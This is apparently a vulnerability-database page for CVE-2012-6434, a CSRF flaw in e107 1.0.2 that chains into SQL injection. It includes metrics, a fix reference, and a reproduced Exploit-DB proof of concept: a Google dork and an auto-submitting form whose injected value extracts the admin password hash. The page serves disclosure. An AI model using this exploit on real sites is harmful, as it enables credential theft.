CVE-2012-6434 : Detail

CVE-2012-6434

Cross-Site Request Forgery - CSRF
A01-Broken Access Control
0.13%V3
Network
2013-01-03
11h00 +00:00
2024-09-16
16h28 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Multiple cross-site request forgery (CSRF) vulnerabilities in e107_admin/download.php in e107 1.0.2 allow remote attackers to hijack the authentication of administrators for requests that conduct SQL injection attacks via the (1) download_url, (2) download_url_extended, (3) download_author_email, (4) download_author_website, (5) download_image, (6) download_thumb, (7) download_visible, or (8) download_class parameter.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-352 Cross-Site Request Forgery (CSRF)
The web application does not, or can not, sufficiently verify whether a well-formed, valid, consistent request was intentionally provided by the user who submitted the request.

Metrics

Metrics Score Severity CVSS Vector Source
V2 6.8 AV:N/AC:M/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 23829

Publication date : 2013-01-01 23h00 +00:00
Author : Joshua Reynolds
EDB Verified : Yes

# Exploit Title: e107 v1.0.2 Administrator CSRF Resulting in SQL Injection # Google Dork: intext:"This site is powered by e107" # Date: 01/01/13 # Exploit Author: Joshua Reynolds # Vendor Homepage: http://e107.org # Software Link: http://sourceforge.net/projects/e107/files/e107/e107%20v1.0.2/e107_1.0.2_full.tar.gz/download # Version: 1.0.2 # Tested on: BT5R1 - Ubuntu 10.04.2 LTS # CVE: CVE-2012-6434 ----------------------------------------------------------------------------------------- Description: Cross-Site Request Forgery vulnerability in the e107_admin/download.php page, which is also vulnerable to SQL injection in the POST form. The e-token or ac tokens are not used in this page, which results in the CSRF vulnerability. This in itself is not a major security vulnerability but when done in conjunction with a SQL injection attack it can result in complete information disclosure. The parameters which are vulnerable to SQL injection on this page include: download_url, download_url_extended, download_author_email, download_author_website, download_image, download_thumb, download_visible, download_class. The following is an exploit containing javascript code that submits a POST request on behalf of the administrator once the page is visited. It contains a SQL injection that would provide the username and password (in MD5) of the administrator to be added to the Author Name of a publicly available download. ------------------------------------------------------------------------------------------ Exploit: <html> <body onload="document.formCSRF.submit();"> <form method="POST" name="formCSRF" action="http://[site]/e107/e107102/e107_admin/download.php?create"> <input type="hidden" name="cat_id" value="1"/> <input type="hidden" name="download_category" value="2"/> <input type="hidden" name="download_name" value="adminpassdownload"/> <input type="hidden" name="download_url" value="test.txt', (select concat(user_loginname,'::',user_password) from e107_user where user_id = '1'), '', '', '', '', '0', '2', '2', '1352526286', '', '', '2', '0', '', '0', '0' ) -- -"/> <input type="hidden" name="download_url_external" value=""/> <input type="hidden" name="download_filesize_external" value=""/> <input type="hidden" name="download_filesize_unit" value="KB"/> <input type="hidden" name="download_author" value=""/> <input type="hidden" name="download_author_email" value=""/> <input type="hidden" name="download_author_website" value=""/> <input type="hidden" name="download_description" value=""/> <input type="hidden" name="download_image" value=""/> <input type="hidden" name="download_thumb" value=""/> <input type="hidden" name="download_datestamp" value=""/> <input type="hidden" name="download_active" value="1"/> <input type="hidden" name="download_datestamp" value="10%2F11%2f2012+02%3A47%3A47%3A28"/> <input type="hidden" name="download_comment" value="1"/> <input type="hidden" name="download_visible" value="0"/> <input type="hidden" name="download_class" value="0"/> <input type="hidden" name="submit_download" value="Submit+Download"/> </form> </body> </html> ------------------------------------------------------------------------------------------ Fix: This bug has been fixed in the following revision: r13058 ------------------------------------------------------------------------------------------ Shout outs: Red Hat Security Team, Ms. Umer, Dr. Wu, Tim Williams, friends, & family. Contact: Mail: infosec4breakfast@gmail.com Blog: infosec4breakfast.com Twitter: @jershmagersh Youtube: youtube.com/user/infosec4breakfast

Products Mentioned

Configuraton 0

E107>>E107 >> Version 1.0.2

References

http://www.exploit-db.com/exploits/23829/
Tags : exploit, x_refsource_EXPLOIT-DB
http://e107.org/changelog
Tags : x_refsource_CONFIRM